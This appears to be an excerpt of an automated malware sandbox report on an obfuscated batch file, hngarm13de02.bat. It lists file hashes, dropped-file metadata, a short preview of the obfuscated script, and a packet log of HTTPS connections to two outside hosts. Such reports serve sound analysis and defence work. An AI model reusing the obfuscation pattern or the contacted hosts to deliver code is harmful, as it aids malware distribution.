                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                      Size (bytes):14
                                                                                                                                                                                                                      Entropy (8bit):3.521640636343319
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Mrv:gv
                                                                                                                                                                                                                      MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                                      SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                                      SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                                      SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:ECHO is off...
                                                                                                                                                                                                                      Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):36
                                                                                                                                                                                                                      Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                      MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                      SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                      SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                      SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:FIND: Parameter format not correct..
                                                                                                                                                                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (16703), with no line terminators
                                                                                                                                                                                                                      Entropy (8bit):5.62683526293235
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                                                      • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                                                      File name:hngarm13de02.bat
                                                                                                                                                                                                                      File size:33'409 bytes
                                                                                                                                                                                                                      MD5:30d859593164bb2e5772ec1f0363b128
                                                                                                                                                                                                                      SHA1:c618d811df76a1012a7e6c3111f12518b89ba377
                                                                                                                                                                                                                      SHA256:72613d206cd2f91fae84304ffed26ff79abdadabaeca47d62e2e09697e5f16d9
                                                                                                                                                                                                                      SHA512:92a7a15dc92d83e9ddb6fa02e7dd3e8d80116844e644b61f0c80feff3939545566376f1ca88ad154cd6f71ec3ecafeb5121156f5285f64d40e72e245dc8f3abd
                                                                                                                                                                                                                      SSDEEP:768:/j/17cVlrNdSQchp9eOFsuUvabviXYPDwo0qQuCXVjWhUId3MB4Ltbo/rNNf7qRt:7/1Nw9z1lDCwHFZ2
                                                                                                                                                                                                                      TLSH:8FE26BB3178F7BEF1A87C734DE1610A264E2B9FD68BE9526D378729C07A101D13264B1
                                                                                                                                                                                                                      File Content Preview:....>nul 2>&1 &cls.; ;@@ec%(........)(........)(.........)(........)^(.........)...(......_...)...%%...(......_...)......(......_...)...(.........)...( ..._...)......( ..._...^)...(........)%h%...( ..._...)......(......_...)......(......_...)......(......
                                                                                                                                                                                                                      Icon Hash:9686878b929a9886
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Dec 17, 2024 19:44:00.083029985 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:00.083080053 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:00.083162069 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:00.094425917 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:00.094441891 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.524907112 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.525006056 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.528584957 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.528597116 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.528944969 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.540715933 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:01.583327055 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:02.628904104 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:02.628966093 CET44349730162.125.69.18192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:02.628976107 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:02.629015923 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:02.635484934 CET49730443192.168.2.4162.125.69.18
                                                                                                                                                                                                                      Dec 17, 2024 19:44:06.983000994 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:06.983094931 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:06.983181000 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:06.986114025 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:06.986148119 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.206885099 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.207089901 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.210257053 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.210284948 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.210705996 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.216900110 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.259381056 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.710655928 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.710716963 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.710799932 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.710969925 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.711033106 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.711097002 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.718879938 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.725960016 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.726047993 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.726064920 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.734177113 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.734260082 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.734275103 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.742732048 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.742850065 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.742863894 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.797028065 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.797089100 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.844078064 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.844140053 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.891017914 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.903492928 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.906178951 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.906579971 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.906599998 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.913055897 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.913144112 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.913158894 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.919925928 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.920093060 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.920106888 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.927995920 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.928105116 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.928117990 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.942081928 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.942223072 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.942267895 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.942286015 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.942343950 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.949696064 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.957371950 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.957434893 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.957468987 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.957483053 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.957652092 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.964617014 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.972089052 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.972177982 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.972192049 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.978290081 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.978460073 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.978472948 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.984210014 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.984278917 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.984292030 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.996021032 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.996097088 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.996258974 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.996274948 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:08.996354103 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.001971960 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.047143936 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.047174931 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.093923092 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.112420082 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.112431049 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.112499952 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.124358892 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.124367952 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.124456882 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.136394024 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.136403084 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.136473894 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.136493921 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.136564016 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.148304939 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.148324013 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.148411989 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.154480934 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.154491901 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.154572964 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.164773941 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.164809942 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.164899111 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.173191071 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.173201084 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.173264980 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.173314095 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.181761980 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.181837082 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.186649084 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.186774969 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.194746017 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.194819927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.199415922 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.199492931 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.207792044 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.207869053 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.216151953 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.216233015 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.225244999 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.225332022 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.229176044 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.229249954 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.320241928 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.320393085 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.324871063 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.325089931 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.333446026 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.333532095 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.338046074 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.338135958 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.346215963 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.346313953 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.354530096 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.354608059 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.363498926 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.363584995 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.366702080 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.366780043 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.372628927 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.372718096 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.378451109 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.378531933 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.384547949 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.384685040 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.387645006 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.387727022 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.393836975 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.393939018 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.397090912 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.397173882 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.403062105 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.403158903 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.409003019 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.409133911 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.412143946 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.412223101 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.418246984 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.418328047 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.422991037 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.423099041 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.428872108 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.429035902 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.434967995 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.435067892 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.438169003 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.438318968 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.444303989 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                      Dec 17, 2024 19:44:09.444401979 CET49731443192.168.2.4172.65.251.78
